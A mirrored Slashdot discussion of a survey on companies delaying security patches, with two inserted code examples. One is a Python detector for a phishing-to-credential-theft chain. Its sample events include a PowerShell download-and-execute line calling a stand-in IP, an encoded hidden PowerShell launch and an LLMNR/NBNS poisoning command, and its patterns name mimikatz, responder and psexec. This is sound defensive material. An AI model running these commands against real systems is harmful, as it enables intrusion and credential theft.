Slashdot Mirror


26% of Companies Ignore Security Bugs Because They Don't Have the Time to Fix Them (bleepingcomputer.com)

Catalin Cimpanu, writing for BleepingComputer: A survey compiled last month at the RSA security conference reveals that most companies are still behind with proper security practices, and some of them even intentionally ignore security flaws for various reasons ranging from lack of time to lack of know-how. The survey, which compiled answers from 155 security professionals from the companies present at the RSA conference, revealed that only 47% of organizations patch vulnerabilities as soon as they are known. Most worrisome is that some companies wait quite some time before applying patches, exposing their IT infrastructure to attacks. More precisely, 16% wait for one month, while 8% said they only apply patches once or twice a year.

51 of 90 comments

  1. It's not time, it's money... by TFlan91 · · Score: 4, Insightful

    It's not that I don't have enough time, I do.

    It's that the powers that be only want to spend time on something if a client pays for it.

    1. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      It's that the powers that be only want to spend time on something if a client pays for it.

      Such situations tend to create regulation.

    2. Re:It's not time, it's money... by TFlan91 · · Score: 2

      If you're a plumber and you hear that the house two doors down, whose pipes you installed 4 years ago during the construction of the house, has a leak, you aren't going to go and fix it for free, are you?

      I don't know what kind of regulation could facilitate good business and secure products. The more secure you make something, usually the more it will cost the client (even with security-first orientated programming).

    3. Re:It's not time, it's money... by v1 · · Score: 4, Insightful

      well, it IS time. but time IS money. so, yeah, kinda.

      Pinheads that only know how to count beans and don't understand the problem are asking each other "Is it important? How much does it cost? What's the return on investment?"

      They don't see the risk or the cost of losing on the risk. They only see the cost of the fix, and that looks like a very poor ROI, and it gets shot down, or continuously delayed.

      --
      I work for the Department of Redundancy Department.
    4. Re:It's not time, it's money... by TFlan91 · · Score: 2

      You work for free?

      I have some bridges you might be interested in.

    5. Re:It's not time, it's money... by sheetsda · · Score: 2

      This.

      And this isn't limited to contracting situations (where you typically hear the word "client"). I have seen this in companies that sell products on the open market, to whole industries. The company takes the approach that development schedules are dictated by what features customers say they want. Since the customer doesn't know the security problem exists they can't say "I want this fixed". It is therefore not a priority.

    6. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      That's also been my point for quite some time. Almost all the time, the last thing on the client's list of requirements is security. Especially if the client is a consumer...

      Hence the need to legislate harshly...

    7. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      Well isn't that the problem: if your company invests in better security measures, charges more and nothing ever happens, then you lose to your competitor that ignored security completely. It's a dice roll, but the big investors can hedge by investing in multiple dice rolls. Most likely by the time the big security breach happens, the only companies left are the ones who didn't invest in security (their competitors either left the space or stopped investing in security to try to compete with the lower prices). Brand damage hardly matters at that point, either, because you have such a lead on any new entrants, that your evils will be well forgotten by the time anyone can attempt to compete with you.

    8. Re:It's not time, it's money... by cyberchondriac · · Score: 3, Funny

      No, but I have some damn fine hearing..!

      --

      Look back up at my post, now look back down, you're on the Internet. Now look back up. I'm a signature.
    9. Re:It's not time, it's money... by Anonymous Coward · · Score: 1

      I second this, every couple weeks I try to underline the fact that our bug graph is going up and we need more people (three man team) yet still find the planning filled to the rim with new features to develop. Occasionally some high-profile customer brings down the hammer on our CEO regarding all the problems that still exist, that seems to help for a couple days.

    10. Re:It's not time, it's money... by Sumus+Semper+Una · · Score: 4, Interesting

      Honest question though: What IS the cost? Equifax suffered a breach of pretty much the most sensitive possible data you can have leaked, and if this article is correct, the total cost is approaching about $500 million. Had there been no data breach or had the data breach never been made public or had there been no political will to prosecute the company then the cost would have been practically nothing.

      Imagine a sort of reverse lottery. If you don't buy a ticket, there is a small chance (and nobody can tell you the exact likelihood) that your reputation will be publicly tarnished and you will be fined millions of dollars. If you buy a ticket, your chance drops drastically (but is never really zero). But the ticket costs thousands of dollars. Would you buy the ticket? What if the ticket is tens of thousands of dollars? What if it's hundreds of thousands of dollars? Is there a point where you will simply refuse to buy the ticket and accept the risk?

      I'm not saying these companies are making the right choice. I'm saying that from a purely practical standpoint I understand why someone might make the choice not to invest heavily into fixing security bugs. It's not the same choice I would make, but I seem to be more risk-averse than the average person judging by the choices I have seen people around me make. Still, if you don't understand why someone would make a decision, how do you ever expect to convince them to make a different decision?

    11. Re:It's not time, it's money... by cwsumner · · Score: 1

      ... Imagine a sort of reverse lottery. If you don't buy a ticket, there is a small chance (and nobody can tell you the exact likelihood) that your reputation will be publicly tarnished and you will be fined millions of dollars. If you buy a ticket, your chance drops drastically (but is never really zero). But the ticket costs thousands of dollars. Would you buy the ticket? ...

      What if the "tickets" had a small but definite chance of being contaminated, and making you very sick? The patches to computer systems have been getting more and more dangerous to people's businesses, to the point where they must consider if the risk from the patch is more than the risk from the criminal intruders. This is the real reason people are waiting, to see what happens to the first to try. All else is excuses to stop you from pestering them.

    12. Re:It's not time, it's money... by Monkey-Wrench-Inc · · Score: 1

      I hate to think of how many times I've had a conversation something like this:

      Manager: Give me a gantt chart of the tasks to get this project done in three months
      Me: The tasks to get it done will take six months
      Manager: No, it's easy. Divide the number of tasks into three months and give each task that much time
      Me: [facepalm]

      No lies detected.

    13. Re:It's not time, it's money... by Tablizer · · Score: 1

      If the PHB's do give it any thought, they may conclude a 15% chance of getting hacked into bankruptcy is worth the risk of growing now by shaving off security measures. If the company croaks, they blame it on the techies (they don't put corner-cutting orders in writing), and move on to a different gig. Rinse, repeat.

    14. Re: It's not time, it's money... by jd · · Score: 2

      Oh, that's easy.

      1. All commercial software must be classed as fit for purpose within specified design parameters.

      2. All commercial software must have a warranty of 5 years where all defects will be fixed at vendor's expense.

      3. Vendors of software that violates CERT's secure coding rules, implements back doors or uses encryption algorithms broken at time of release shall be liable for losses due to security flaws.

      4. Vendors of mission-critical software must, on demand, provide proof of formal methods, extreme programming or tandem programming, and must be able to show ISO 900x compliance where relevant.

      5. Vendors who cannot provide a court with design documents and specifications, and proof the software complies with them, shall be deemed automatically at fault in any lawsuit.

      6. It shall be a crime punishable by 10 years to provide any mission critical device with unsecured or unauthenticated network access, whether anyone is injured or not.

      That should take care of everything.

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    15. Re:It's not time, it's money... by Kjella · · Score: 1

      The real issue with the reverse lottery is not whether the company would stomach the risk. It's that to the individual manager the risk is very low, while the worst consequence is that he's fired. It's the same reason many managers like to kick the can down the road, it's not because it's good for the business but his performance looks good one more quarter. They're seeing most of the upside when it goes well and very little of the downside when things go catastrophically bad.

      --
      Live today, because you never know what tomorrow brings
    16. Re:It's not time, it's money... by Darinbob · · Score: 1

      It's true, the security must be treated as a feature, and the customer must be told that security is a feature that they want (sometimes it seems this isn't true). However the fault often lies in sales and marketing, where a deadline for product delivery is set before product design and development even begins. Security often gets short-shrift at the end when a project is running late. That's why your security subject matter expert must always be a bastard willing to shout in meetings. The security team should not be trying to win a popularity contest. And if you don't have a security team, then you need to get one.

      Also, don't let your company be run by a bunch of people who think they know it all but have no real world experience. They're the ones most likely to want to shift stuff fast and get their bonus/options and cash out before it comes crashing down.

    17. Re:It's not time, it's money... by thegarbz · · Score: 1

      What IS the cost?

      You can't consider the cost in isolation. You can only consider the risk. If you only consider cost then nothing would ever advance as you don't take into account the likelihood of the high-cost event hitting you.

      Risk is fundamentally the likelihood of something happening and the consequence of it happening. I could die from getting hit by an asteroid. It's unlikely so I live with the risk rather than building an asteroid proof hat.

    18. Re:It's not time, it's money... by v1 · · Score: 1

      Imagine a sort of reverse lottery. If you don't buy a ticket, there is a small chance (and nobody can tell you the exact likelihood) that your reputation will be publicly tarnished and you will be fined millions of dollars. If you buy a ticket, your chance drops drastically (but is never really zero). But the ticket costs thousands of dollars.

      That already exists, and it's called "medical insurance" ;)

      --
      I work for the Department of Redundancy Department.
    19. Re: It's not time, it's money... by david_thornley · · Score: 1

      Writing secure software isn't really that hard, but you need to do it from the beginning and you need to keep it in mind when making changes.

      Which should mean that there is complicated software out there without security flaws, and I don't believe that.

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  2. patch vulnerabilities as soon as they are known by Anonymous Coward · · Score: 1

    Yea, no shit. You don't just apply a vendor supplied patch to prod and hope it doesn't break anything.

    1. Re:patch vulnerabilities as soon as they are known by supremebob · · Score: 2

      Yeah, that didn't exactly work out well for the early adopters of the Spectre and Meltdown fixes. Not only were they initially buggy as well, but they didn't even fix all of the security flaws.

      Like it or not, it's usually best to wait a day or two for someone else to be the guinea pig for security patches before putting them into Production, unless the issue is actively being exploited by a virus or a worm.

    2. Re:patch vulnerabilities as soon as they are known by thegreatbob · · Score: 1

      Better still, some (*cough* MS patches going to Win7 and 2K8) introduced additional flaws...

      --
      There is no XUL, only WebExtensions...
  3. Then 26% should be sued by Rick+Schumann · · Score: 3

    Fix your shit or be run out of business. I think I speak for the majority when I say we're all sick and bloody well tired of having every gods-be-damned thing on the planet hacked by whoever because the firmware/software is written poorly.

    1. Re:Then 26% should be sued by Anonymous Coward · · Score: 3, Insightful

      Were it only so simple, but a few things tend to push security down the priority list.

      1) Lack of perceived value. If it takes company A 100 man hours to implement a product with proper security, and company B 80 man hours to do the same thing but with poorer security practices, then most clients and consumers will choose company B (assuming no other factors at play) because of the reduced cost and the fact that good secure implementations are not easy to ascertain at a glance.

      2) Lack of perceived consequences for poor security. Equifax has had one of the biggest breaches of personal information for the US. Its stock price hasn't recovered back to its previous highs, but it's slowly and steadily coming back up (and to be fair, it was overvalued in the first place). To most people that just means that the cost of having a big breach isn't that big a deal.

      3) The traditional fight between convenience and security. Convenient things make good first impressions, good first impressions tend to make sales.

      There's some other factors but I think those three points tend to broadly cover most of the reasons why security isn't prioritized. I wish it wasn't so but that's the reality that we have to deal with.

    2. Re:Then 26% should be sued by Rick+Schumann · · Score: 1

      How hard is it to not leave a hard-coded Administrator password in something as a backdoor? Also if you're so goddamned smart then why are you posting as an AC? Is it because you're actually an idiot who should have kept his mouth shut?

    3. Re:Then 26% should be sued by holophrastic · · Score: 1

      It's not my shit to fix. I didn't create it. I bought a [software] tool, I paid for it, I've been using it for some time.

      It was always broken, but it took this much time for someone to notice the bug. Now there's a fix.

      I don't have time to stop manufacturing white tube socks in order to upgrade the e-mail client that I purchased years ago.

      So sorry.

      You have three options.

      The first is the current plan -- I get to it when I get to it, and you don't complain.

      The second is that you have the creator of the software pay to upgrade me -- that means paying for my downtime and retraining too.

      The third is that you do what you do in every other industry -- you start prosecuting the criminals. It's not illegal to get burglarized. It's criminal to burgle.

      So, let me ask you this: do you live in a house? Is there a lock on your front door? Well, hackers have defeated that lock, so you need to upgrade to a dead-bolt. Do you have a dead-bolt? Well, hackers can break windows too. You need to upgrade to bars on your windows.

      Do you drive a car? At high speeds? On roads with on-coming traffic? Separated by nothing but a yellow stripe of paint? I guess you need to upgrade to a tank.

      I'm not responsible for criminals breaking down my door with more equipment than I can afford to resist. So sorry. My entire car can be lifted up and carried away by six teenage boys. It doesn't matter how good my locks are. Half of my car is canvas, so a knife is sufficient.

      So, like everything else in my life, I'll upgrade my systems when a) I buy new systems or b) after I get attacked. Welcome to life.

      Meanwhile, we've solved this problem long ago: it's called law enforcement. You can't stop me from walking up to someone in public and killing them with a baseball bat.

      So start prosecuting criminals.

    4. Re:Then 26% should be sued by vtcodger · · Score: 1

      If your solution is writing quality software, that's a non-starter. It might be possible to write really good software. But it'd be text based. No fonts. No images. Very few capabilities. Few or no configuration options. And it'd cost.

      Trust me, the world is not yet ready for a life without cat videos. Maybe after another decade of pain, that'll look like an OK idea. But for the time being we're going to continue to hold things together with duct tape and charge forth into a glorious (if wildly insecure) future while blaming other people for the problems we are creating.

      --
      You can't see ANYTHING from a car, You've got to get out of the goddamned contraption and walk...Edward Abbey
    5. Re: Then 26% should be sued by jd · · Score: 2

      If you bought a car and the car is then recalled due to a propensity for the brakes to fail, you don't get to claim in court that the pedestrian you ran into was just unlucky but that it wasn't your shit to fix.

      That excuse doesn't fly. If the product is dangerously defective and you know that it is, you are liable.

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    6. Re: Then 26% should be sued by jd · · Score: 1

      In part, software vendors renting rather than selling products are responsible, along with a refusal to offer a warranty.

      I'd suggest placing stiff penalties on failing to follow established practices, and jail sentences for failing to fix in a timely manner or responsibly upgrade in a timely manner.

      Making it a criminal offence with a ten year fixed tariff should liven things up.

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    7. Re:Then 26% should be sued by FormOfActionBanana · · Score: 1

      Should we give you a secure coding quiz?

      --
      Take off every 'sig' !!
    8. Re: Then 26% should be sued by holophrastic · · Score: 1

      I won't allow you to equate the privacy of names and phone numbers with instant death.

    9. Re: Then 26% should be sued by jd · · Score: 1

      From a software standpoint, a failure to validate inputs and a failure to validate code against a specification is independent of what the code does.

      In ISO 9000 training, we were taught that we should consider anything that could cost $1m or more if things went wrong to be equivalent to killing someone. But, hey, what does NASA know about failure not being an option?

      --
      It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
    10. Re:Then 26% should be sued by Anne+Thwacks · · Score: 1

      If it takes company A 100 man hours to implement a product with proper security, and company B 80 man hours to do the same thing but with poorer security practices, then most clients and consumers will choose company B

      Most non-technical people do not have even the most basic grasp of the issues, and cannot be expected to. They assume that software is required to be "goods of merchantable quality" like anything else, and believe bugs crawl into software the same way cockroaches get in the kitchen. They simply don't understand that most software is designed and written by people who work in an environment where "doing the right thing" could be a sackable offence (despite the fact that this also appears to be the case in a lot of dead-end jobs like working for Amazon).

      This includes most CXOs, judges and juries.

      Massive legal penalties are required. Urgently. In particular, MS executives should be sent to Parchment Farm in droves.

      And, "a jury of your peers" should mean that the jury should have sufficient understanding of the issues as to be in a position to grasp the concepts involved in the charges (a problem with most white collar crime). However, we don't want to expose ourselves to a situation where the police police themselves - we know where that ends up (blood on dance floor).

      --
      Sent from my ASR33 using ASCII
    11. Re: Then 26% should be sued by Salgak1 · · Score: 1
  4. Like Windows XP in China. by xack · · Score: 1

    No support from Microsoft for over four years but still over 10% market share for the security hole OS. It will get even worse when Firefox drops support. It gets to the point where it's easier to reformat every few months than to keep updating. Most viruses probably get great firewalled anyway.

  5. In related news by rsilvergun · · Score: 5, Informative

    74% of companies lie on surveys.

    --
    Hi! I make Firefox Plug-ins. Check 'em out @ https://addons.mozilla.org/en-US/firefox/addon/youtube-mp3-podcaster/
    1. Re:In related news by 140Mandak262Jamuna · · Score: 1

      92.3% of the statistics are made up on the spot.

      --
      sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
  6. depth of defense by Spazmania · · Score: 1

    Correct security is about depth of defense. If you -have- to patch immediately every time then you've already failed.

    Take your time. Do it right. If you understand your security posture and have designed it well, patching once or twice a year may well be sufficient.

    --
    Moderating "-1, Disagree" is simple censorship. Have the guts to post your opinion.
  7. no consequences by Anonymous Coward · · Score: 3, Insightful

    it's because of the lack of consequences, not because of time.... they would take the time to fix the issues if there would be appropriate consequences if they don't

  8. Re:Nobody should by jbmartin6 · · Score: 1

    This article is just as good as those "studies" which revealed people would tell their password for a scoop of ice cream. Without any context the information is meaningless. Was it even really the password? Which password, their bank account or some useless website login? Here's a breathtakingly ignorant statement from the article:

    even if they were to hire penetration testing services they were sure the pen-testers wouldn’t expose any new risks or flaws. The sheer ignorance of such statement somewhat explains why some respondents admitted to not having time to apply security patches

    We hired a pentester and they didn't expose any flaws, we already knew about all of them. Phishing email, macro or exploit to powershell to downloaded binary to credential theft via LLMNR/NBNS to pass the hash to admin account, and so on. If you are hiring a pentester solely to expose new flaws, you are doing it wrong. Much like the author of this article.

    --
    This posting is provided 'AS IS' without warranty of any kind, implied or otherwise.
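The chain jbmartin6 lists above (phishing mail, macro, PowerShell, downloaded binary, LLMNR/NBNS credential theft, pass the hash) is exactly the sequence a pentester exercises and the one a blue team should already be correlating on. What follows is an added example, not part of the thread and not code from any product named on this page: a small Python sketch that classifies process-creation events into the stages of that chain and raises an alert when several of them line up for one host and user. The event tuple layout, field names, indicator patterns and sample events are all constructed for illustration; real telemetry would come from Sysmon or an EDR and the patterns would need tuning to the environment.

```python
import re
from collections import defaultdict

# Process names involved in the stages of the chain described in the comment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Deliberately loose indicators (assumed for this example; a real ruleset is broader and tuned).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin|-enc\b|-encodedcommand",
    re.IGNORECASE,
)
CRED_THEFT = re.compile(
    r"responder|inveigh|mimikatz|sekurlsa|-llmnr\b|-nbns\b|pth-|wmiexec|psexec",
    re.IGNORECASE,
)

# Kill-chain order used when presenting an alert.
STAGE_ORDER = ["office_spawned_script_host", "download_cradle", "dropped_binary", "credential_theft"]

# Constructed sample telemetry (assumed layout, not a real log format):
# (timestamp, host, user, parent_image, image, command_line)
SAMPLE_EVENTS = [
    (1, "ws01", "alice", "explorer.exe", "outlook.exe", "outlook.exe"),
    (2, "ws01", "alice", "outlook.exe", "winword.exe", "winword.exe /n invoice.docm"),
    (3, "ws01", "alice", "winword.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -enc AAAA"),
    (4, "ws01", "alice", "powershell.exe", "powershell.exe",
     "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"),
    (5, "ws01", "alice", "powershell.exe", "update.exe",
     "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe"),
    (6, "ws01", "alice", "update.exe", "powershell.exe",
     "powershell.exe Invoke-Inveigh -NBNS Y -LLMNR Y"),
    (7, "ws02", "bob", "explorer.exe", "winword.exe", "winword.exe report.docx"),
    (8, "ws02", "bob", "winword.exe", "AcroRd32.exe", "AcroRd32.exe report.pdf"),
]


def classify(parent_image, image, command_line):
    """Map one process-creation event to a chain stage, or None if it matches nothing."""
    parent, child, cmd = parent_image.lower(), image.lower(), command_line.lower()
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return "office_spawned_script_host"   # macro handing off to PowerShell & co.
    if child in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(cmd):
        return "download_cradle"              # script host fetching the next stage
    if parent in SCRIPT_HOSTS and child.endswith(".exe") and "\\temp\\" in cmd:
        return "dropped_binary"               # script host launching something out of %TEMP%
    if CRED_THEFT.search(cmd):
        return "credential_theft"             # LLMNR/NBNS poisoning or hash tooling
    return None


def find_chains(events, min_stages=3):
    """Return {(host, user): [stages]} for principals showing at least min_stages distinct stages.

    Stages are reported in kill-chain order; the correlation is per host and user,
    because no single stage above is conclusive on its own.
    """
    seen = defaultdict(set)
    for _ts, host, user, parent, image, cmd in sorted(events):
        stage = classify(parent, image, cmd)
        if stage:
            seen[(host, user)].add(stage)
    alerts = {}
    for key, stages in seen.items():
        ordered = [s for s in STAGE_ORDER if s in stages]
        if len(ordered) >= min_stages:
            alerts[key] = ordered
    return alerts


if __name__ == "__main__":
    for (host, user), stages in find_chains(SAMPLE_EVENTS).items():
        print(f"ALERT {host}/{user}: " + " -> ".join(stages))
```

The point is the correlation across stages for one host and user, not any single indicator; Office spawning PowerShell or a `-enc` argument on its own will also fire on legitimate admin tooling. The credential-theft step in particular is cheaper to remove than to detect: disabling LLMNR and NetBIOS name resolution on domain workstations takes the poisoning attack away entirely.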
  9. Purely from academic interest ... by Hognoxious · · Score: 1

    Purely from academic interest and in the cause of like research and al that, which 26%?

    --
    Confucius say, "Find worm in apple - bad. Find half a worm - worse."
  10. They are lying. by JimSadler · · Score: 1

    If you have a labor vs. time issue you hire more people with the abilities needed to do the job. That means it is really a money problem or a cheap problem. Where you run into this is when you are a consumer. You have an issue. You make a phone call. You run into fruitless robotic replies that do not address your issue at all, and every time they steer you to another robotic responder you end up at another dead end. The penny pinchers have gained control. It is one heck of a lot cheaper to jerk people around with poorly functioning answering machine programs. And it gets a lot worse. The next treat is that when you finally find a way to connect with a human they are usually so under-trained or inadequate for their jobs that the answers you get are way off base and make things even worse than they were before. I have found the way to get around those voice robots, and that is to call the sales department. No business is dumb enough to insult potential buyers with no human answering the phone. The sales department will usually transfer you to an employee who supposedly is familiar with the issue. If you want practice at this madness simply become a Comcast customer. You can have a real thrill as they can't figure out that you were double billed for over four months. Rarely do the people who answer the phones, if you are lucky enough to reach them, actually know what they are doing. And, more of a howler, the typical employee thinks they are super good at their job.

    1. Re:They are lying. by david_thornley · · Score: 1

      If you have a labor vs. time issue you hire more people with the abilities needed to do the job.

      Ah, another person who hasn't yet read Brooks' "Mythical Man-Month". There's a chapter examining exactly what happens when you hire more qualified people because you're not going to make the deadline.

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  11. Blue Screens by shayd2 · · Score: 1

    Given the history of "patches" bricking machines, you don't want to be on the bleeding edge of patching.

    Most organizations don't have the resources to hold a fall-back copy of their production server(s).

    1. Re:Blue Screens by viperidaenz · · Score: 1

      Most (read: all) organisations I've worked for have two sets of production servers. Prod and DR.
      Software updates and patches only happen to one at a time, until it has been proven good. If there's a failure, there's almost no down-time as the server roles are switched.

  12. Because that worked so well by rsilvergun · · Score: 1

    for Microsoft. And if you want hardened firmware for the tablet you give your kid to watch youtube be my guest. It'll be $1500. Me? I'll stick to my $60 el-cheapo. I don't always need perfect security.

    --
    Hi! I make Firefox Plug-ins. Check 'em out @ https://addons.mozilla.org/en-US/firefox/addon/youtube-mp3-podcaster/
  13. Or.. by MpVpRb · · Score: 1

    ..don't have the technical competence

    Security is hard

  14. Security only becomes a critical issue by nehumanuscrede · · Score: 1

    when your Corporate name is being dragged through the mud, the Litigation Monster makes an appearance, your share-holders are getting out the torches and pitchforks and management is frantically looking through the list to see which Junior Developer they can pin the blame on for the 'bug' in the code.

    THAT is the only time companies take security seriously because, let's be honest, there are otherwise no consequences for being the Corporate equivalent of an incompetent fuck up. A slap on the wrist, a mediocre fine, maybe a name change and it's back to business as usual.

    Once upon a time, a brand name MEANT something. $brand could command a higher price tag because $brand was synonymous with a quality product.

    Those days are long gone.

    Thus the era of Incompetence has arrived. Where some decent Q/A or even realistic Beta Testing may have caught your problem long before it became that giant Iceberg you're sailing into.

    But no one cares. We have enough life boats.

    Full speed ahead ! :|

  15. . . . or they spent the money on something else. . by Salgak1 · · Score: 1

    . . . I run a Secure Code Analysis team. I am **CONSTANTLY** bombarded with "well, this is legacy code, there's no budget left for security. . . ."

    Dude. One of the requirements in the contract was to comply with the appropriate regulations and best practices. Which, despite my team bugging you for literally YEARS, and pointing out where the contract specifically requires code reviews. . . .I get told "when did this requirement come in" and "we don't have the money for that." But apparently they had the money for three extra Vice Presidents and their staffs. . . /boggle

  16. Risk Management. . . by Salgak1 · · Score: 1

    . . . anyone who has studied for a CISSP or SANS GIAC Cert knows about risk management.

    1. How likely is the bug to be exploited? (x times a year)
    2. How much damage will the bug cost? (y dollars per attack)

    . . . and THEN: how much will it cost to fix the bug? (call it "z": recoding, testing, review, distribution of fix)

    Then you do the math: If z is less than x times y, it makes sense to fix the bug. If z is more than x times y, and especially much more, you accept the risk. And you revisit the question periodically, as security is an ongoing process, not a single pass-it-and-go state.
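Salgak1's x, y and z, carried through as an added example that is not part of the thread. It goes beyond the comment's one-line comparison in two ways a practitioner needs: it adds a time horizon, since z is paid once while x times y recurs every year the code stays in service, and a control-effectiveness factor for partial fixes, so a list of findings can be ranked by return on security investment (ROSI) when there is budget for only some of them. The class and function names and every dollar figure are constructed for illustration, not real estimates.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    """One security bug with the three numbers from the comment plus a fix-quality factor."""
    name: str
    x_per_year: float           # expected successful exploitations per year (annual rate of occurrence)
    y_per_event: float          # loss per successful exploitation, dollars (single loss expectancy)
    z_fix_cost: float           # one-off cost to fix: recoding, testing, review, distribution
    effectiveness: float = 1.0  # share of the annual loss the fix removes (a workaround may be < 1)


def annual_loss(f: Finding) -> float:
    """x * y: expected loss per year if nothing is done (annualized loss expectancy)."""
    return f.x_per_year * f.y_per_event


def loss_avoided(f: Finding, horizon_years: float) -> float:
    """Loss the fix prevents over the period the code is expected to keep running."""
    return annual_loss(f) * f.effectiveness * horizon_years


def rosi(f: Finding, horizon_years: float) -> float:
    """Return on security investment: (loss avoided - fix cost) / fix cost. Negative means accepting is cheaper."""
    return (loss_avoided(f, horizon_years) - f.z_fix_cost) / f.z_fix_cost


def decide(f: Finding, horizon_years: float = 1.0) -> str:
    """The comment's rule, with the horizon made explicit: fix when avoided loss exceeds z."""
    return "fix" if loss_avoided(f, horizon_years) > f.z_fix_cost else "accept"


def rank(findings, horizon_years: float = 1.0):
    """Order findings so a limited fix budget goes where it avoids the most loss per dollar."""
    return sorted(findings, key=lambda f: rosi(f, horizon_years), reverse=True)


# Constructed figures for illustration only.
FINDINGS = [
    Finding("SQL injection in customer portal", x_per_year=2.0, y_per_event=250_000, z_fix_cost=40_000),
    Finding("Expired TLS cert on internal dashboard", x_per_year=0.05, y_per_event=20_000, z_fix_cost=5_000),
    Finding("Legacy app, network ACL workaround only", x_per_year=1.0, y_per_event=100_000,
            z_fix_cost=30_000, effectiveness=0.5),
    Finding("RDP exposed to the internet", x_per_year=4.0, y_per_event=80_000, z_fix_cost=2_000),
]


if __name__ == "__main__":
    for horizon in (1.0, 10.0):
        print(f"--- horizon {horizon:g} year(s) ---")
        for f in rank(FINDINGS, horizon):
            print(f"{decide(f, horizon):6} ROSI={rosi(f, horizon):8.2f}  {f.name}")
```

Two things the comment's version hides show up in the sample: the dashboard certificate is "accept" on a one-year view and "fix" on a ten-year view, because z is paid once, and the exposed RDP service outranks the SQL injection even though its per-event loss is smaller, because the fix is nearly free. The x and y estimates are the weak point of the whole method, which is why the comment's "revisit periodically" matters more than the arithmetic.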